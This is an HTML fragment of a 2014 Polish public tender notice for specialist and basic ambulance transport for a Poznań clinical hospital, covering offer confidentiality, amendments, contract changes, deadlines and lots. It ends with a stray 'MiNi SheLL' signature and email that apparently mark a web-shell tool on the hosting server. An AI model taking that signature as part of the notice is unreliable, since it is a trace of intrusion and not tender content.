4.2	Zamawiający zaleca, aby informacje zastrzeżone, jako tajemnica przedsiębiorstwa były przez Wykonawcę złożone w oddzielnej wewnętrznej kopercie z oznakowaniem TAJEMNICA PRZEDSIĘBIORSTWA, lub spięte oddzielnie od pozostałych, jawnych elementów oferty. W razie braku takiego wskazania, Zamawiający uzna,  że wszelkie oświadczenia i zaświadczenia składane w trakcie postępowania są jawne bez zastrzeżeń.
4.3	Zastrzeżenie informacji, które nie stanowią tajemnicy przedsiębiorstwa w rozumieniu ustawy o zwalczaniu nieuczciwej konkurencji będzie traktowane jako bezskuteczne i skutkować będzie ich odtajnieniem.
5.	Zmiana  lub  wycofanie  oferty
5.1	Wykonawca  może  wprowadzić  zmiany, poprawki, modyfikacje i uzupełnienia do złożonej oferty pod  warunkiem,  że  Zamawiający otrzyma pisemne zawiadomienie o wprowadzeniu zmian przed terminem składania ofert. Powiadomienie o wprowadzeniu zmian musi być złożone  wg  takich samych zasad, jak składana oferta tj. w kopercie odpowiednio oznakowanej napisem ZMIANA. Koperty oznaczone ZMIANA zostaną otwarte przy otwieraniu oferty Wykonawcy, który wprowadził zmiany i po stwierdzeniu poprawności procedury dokonywania zmian, zostaną dołączone do oferty.
5.2	Wykonawca ma prawo przed upływem terminu składania ofert wycofać się z postępowania poprzez złożenie pisemnego powiadomienia, według tych samych zasad jak wprowadzanie zmian i poprawek z napisem na kopercie WYCOFANIE. Koperty oznakowane w ten sposób będą otwierane w pierwszej kolejności po potwierdzeniu poprawności postępowania wykonawcy oraz zgodności ze złożonymi ofertami. Koperty ofert wycofanych nie będą otwierane.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany bądź uzupełnienia niniejszej umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności. 
2.	Z uwzględnieniem zapisu art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz  określa warunki tych zmian poprzez wprowadzenie do zawartej umowy następujących aneksów;
a.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, 
np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć 
z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
b.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie  usług, a które to działania nie są konsekwencją winy którejkolwiek ze stron.
c.   aneks cenowy dopuszczający  jedną  zmianę  ceny  po  upływie  dwunastu  miesięcy  obowiązywania  umowy  w oparciu  o wysokość wskaźnika wzrostu cen towarów i usług (wskaźnik średnioroczny) podanego w Komunikacie Prezesa Głównego Urzędu Statystycznego opublikowanego w Dzienniku Urzędowym RP Monitor Polski.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dzp.gpsk.ump.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: GPSK UM Poznań ul. Polna 33, budynek E, pokój 104 lub pod adresem poczty elektronicznej: btylska@gpsk.am.poznan.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2014 godzina 09:00, miejsce: Siedziba Zamawiającego przy ulicy Polnej 33 - Kancelaria Ogólna, budynek D, pokój nr 317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Transport  karetką specjalistyczną S.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewóz pacjentów w pozycji leżącej, siedzącej lub na wózku inwalidzkim karetką S z co najmniej trzema osobami uprawnionymi do wykonywania medycznych czynności ratunkowych, w tym lekarz systemu oraz pielęgniarka systemu lub ratownik medyczny z siedziby Zamawiającego w Poznaniu, przy ul. Polnej 33,  na wezwanie, we wszystkie dni tygodnia  
i  o  każdej porze.
Przewidywana szacunkowa  ilość  godz. z lekarzem: 190 / na dwa lata
Przewidywana szacunkowa ilość km z lekarzem: 2 850 / na dwa lata.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Transport karetką podstawową  P.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przewóz  pacjentów w pozycji leżącej lub siedzącej lub na wózku inwalidzkim na wezwanie karetką P, z co najmniej  dwoma osobami uprawnionymi do wykonywania  medycznych czynności ratunkowych o kwalifikacji pielęgniarka systemu lub ratownik medyczny z siedziby Zamawiającego w Poznaniu, przy ul. Polnej 33  we wszystkie dni tygodnia i o każdej porze.
Przewidywana szacunkowa  ilość godz. z  ratownikiem:  220 / na dwa lata
Przewidywana szacunkowa ilość km z  ratownikiem: 3 120 / na dwa lata.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com